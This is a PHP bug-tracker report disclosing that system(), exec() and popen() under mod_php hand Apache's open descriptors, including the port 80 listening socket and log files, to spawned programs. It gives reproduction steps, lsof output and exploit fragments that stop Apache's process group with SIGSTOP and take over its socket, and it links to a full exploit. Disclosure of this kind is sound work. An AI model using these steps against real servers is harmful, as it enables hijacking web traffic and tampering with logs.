From: dimmoborgir at gmail dot com
Operating system: UNIX
PHP version: 5.2.0RC4
PHP Bug Type: Apache2 related
Bug description: mod_php: system() (and similar) don't cleanup opened handles
of Apache
Description:
------------
The problem is in exec, system, popen (and similar) PHP functions. The
fact is that PHP doesn't sanitize opened file descriptors before executing
a program.
These functions use popen() C function to spawn a program.
popen() is equal to the successive execution of
pipe(), fork(), dup2(), exec().
These functions keep all opened handles. (Except STDOUT, which is replaced
to pipe).
This bug makes php-includes vulnerabilities more dangerous.
If the server uses mod_php, and we can execute shell commands via
system(), then we can, e.g. stop apache processes (by sending a SIGSTOP),
and to listen and process connections on 80 port (opened by Apache, and
transmitted to us by PHP). Also we can write anything to its errorlog.
Reproduce code:
---------------
Some steps to reproduce a bug.
First. Simple program to wait :)
# cat test1.c
int main()
{
setsid( );
sleep( 10000 );
}
#gcc -o test1 test1.c
Ok. Let's make a php script:
#cat a.php
<?php
system( "./test1" );
?>
Request: http://127.0.0.1/a.php
Good. Now see opened handles:
#lsof | grep test1
test1 cwd DIR /usr/local/apache2/htdocs
test1 rtd DIR /
test1 txt REG /var/www/html/test1
test1 mem REG /lib/tls/libc-2.3.5.so
test1 mem REG /lib/ld-2.3.5.so
test1 mem REG [stack] (stat: No such file or directory)
test1 0r CHR /dev/null
test1 1w FIFO pipe
test1 2w REG /usr/local/apache2/logs/error_log
test1 3u IPv4 *:http (LISTEN)
test1 4r FIFO pipe
test1 5w FIFO pipe
test1 6w REG /usr/local/apache2/logs/error_log
test1 7w REG /usr/local/apache2/logs/access_log
test1 8r 0000 unknown inode type
test1 9u IPv4 10.0.0.2:http->10.0.0.1:2134 (CLOSE_WAIT)
So, our test1 has apache's handles. Now we can do something like that:
int p = getsid( 0 ); // get current Process Group Id
setsid( ); // become session leader
kill( -p, SIGSTOP ); // good night, Apache Process Group :)
And after that:
for ( sock = 3; sock < getdtablesize(); sock++ ) // find valid socket
handle
if ( listen (sock, 10) == 0 ) break;
Full exploit is available on http://hackerdom.ru/~dimmo/phpexpl.c
Expected result:
----------------
I didn't expected program, executed via system() PHP function, to have all
opened descriptors of Apache Web Server (including 80 port, error and
access logs, opened connections, etc...)
Actual result:
--------------
Our PHP program has all descriptors of Apache Server.
--
Edit bug report at http://bugs.php.net/?id=38915&edit=1
--
Try a CVS snapshot (PHP 4.4):
http://bugs.php.net/fix.php?id=38915&r=trysnapshot44
Try a CVS snapshot (PHP 5.2):
http://bugs.php.net/fix.php?id=38915&r=trysnapshot52
Try a CVS snapshot (PHP 6.0):
http://bugs.php.net/fix.php?id=38915&r=trysnapshot60
Fixed in CVS: http://bugs.php.net/fix.php?id=38915&r=fixedcvs
Fixed in release:
http://bugs.php.net/fix.php?id=38915&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=38915&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=38915&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=38915&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=38915&r=support
Expected behavior: http://bugs.php.net/fix.php?id=38915&r=notwrong
Not enough info:
http://bugs.php.net/fix.php?id=38915&r=notenoughinfo
Submitted twice:
http://bugs.php.net/fix.php?id=38915&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=38915&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=38915&r=php3
Daylight Savings: http://bugs.php.net/fix.php?id=38915&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=38915&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=38915&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=38915&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=38915&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=38915&r=mysqlcfg
